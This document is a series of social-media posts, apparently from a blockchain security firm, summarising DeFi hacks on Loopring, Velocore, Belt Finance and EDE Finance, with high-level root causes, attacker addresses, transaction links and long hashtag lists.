On June 9, the Defi ZK-rollup protocol @loopringorg on the #ethereum chain was exploited for ~💰1373 $ETH worth ~ 💰$5M. How the Hack Happened? The hacker breached the security (2FA service) of the Loopring Official Guardian wallet and obtained the required privileges to pose as a wallet owner, only to reset ownership later. This enabled the exploiter to initiate the recovery process from the Official Guardian wallet and withdraw assets. To contain the hack and protect user funds, the Guardian-related and 2FA-related operations have been temporarily suspended. To obfuscate the stolen funds trail, the exploiter has already started moving funds to different addresses. Loopring is in touch with law enforcement and professional security teams to track down the exploiter. While the hack is being investigated, the possible reason for the breach of 2FA security could be the SIM swap fraud. 💡Learn about SIM swap frauds here: immunebytes.com/blog/how-to-pr… 💡Evaluate the security of your crypto wallets after gaining insights about the crypto wallet security here: immunebytes.com/blog/how-to-ma… Hacker Addresses: etherscan.io/address/0x44f8… etherscan.io/address/0xbace… Hack Txns: etherscan.io/tx/0x2ab212f02… etherscan.io/tx/0xb6aaa3917… #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity

Velocore—the decentralized exchange (DEX) protocol on zkSync and Linea—was hacked on June 2, causing a loss of ~💰$10M of the users’ funds. The root cause of the hack has been found to be the vulnerabilities within the Balancer-style CPMM pool contract. The Vulnerabilities There was a flaw in the logic within the ‘velocore__execute()’ function of the ConstantProductPool. Along with that, there was also an underflow vulnerability which comes into play when withdrawing LP into a single token. On top of that, there was an additional vulnerability due to which the `velocore__execute()`function does not verify whether the caller is the Vault or not? The attacker, who was initially funded from the Tornado cash, exploited these vulnerabilities in conjunction with flash loans to carry out the attack. The stolen funds were later bridged to the Across Bridge, finally deposited it back to the Tornado cash. Learn How Underflow and Overflow Vulnerabilities can Prove to Be Fatal In an Attack immunebytes.com/blog/explained… Hack Status As per the official update by Team Velocore, - All volatile pools(CPMM) in Linea and zkSyncEra Velocore are affected. - No stable pools are affected. - The vulnerabilities have been taken care of to avoid any further exploit - A snapshot of the blockchain state prior to the incident has already been taken. - The affected users will be duly compensated once the operations are resumed. - Efforts are ongoing to track, freeze and recover the stolen funds by collaborating with various exchanges and security security partners. - An on-chain negotiation with the hacker is also being contemplated. Balancer-style CPMM pool contract github.com/velocore/veloc… Attacker address: 0x8cdc37ed79c5ef116b9dc2a53cb86acaca3716bf Stolen Funds are currently parked at-0xe4062fcade7ac0ed47ad794028967a2314ee02b3 EOA: 0x8cdc37ed79c5ef116b9dc2a53cb86acaca3716bf 0xd8c465ecd8c6f1a0c114890f1ef553f82e59d274 Affected Contracts: 0xed4e130f6f9e68918996f7e1e46a3306b3e12cec 0xb7f6354b2cfd3018b3261fbc63248a56a24ae91a 0xc030fba4b741b770f03e715c3a27d02c41fc9dae 0xf7f76b30a301524fe76508546B1e3762eF2B9267 Hack Txs lineascan.build/tx/0xed11d5b01… lineascan.build/tx/0x37434e674… explorer.zksync.io/tx/0x4156d73ca… #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity

On This Day: Revisiting Past 😈#Crypto #Hacks May 29, marks the day of multiple hacks in the Web3 space. 📌On May 29, 2021, defi Belt Finance @BELT_Finance on Binance Smart Chain (BSC) came under a flash loan attack and lost ~$6.2M worth of cryptocurrencies. The exploiter deployed a smart contract leveraging PancakeSwap for flash loans and exploited the beltBUSD pool along with its underlying strategy protocols. Subsequently, they executed the contract eight times, yielding a total profit of 6,234,753 BUSD. 📌On May 29, 2023, dex @EDE_Finance on the #Arbitrum chain fell victim to a white hat exploit, which was conducted using flash loans and Oracle price manipulation. The white hat hacker who profited 597,694 USDC and 86,222 USDT (worth ~$520K at the time of the hack), offered to return 90% of the stolen funds in exchange for a 10% bug bounty. Exploited contract: arbiscan.io/address/0x171c… Attacker Address: arbiscan.io/address/0x8082… Attacker’s contract: arbiscan.io/address/0x6dd3… #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity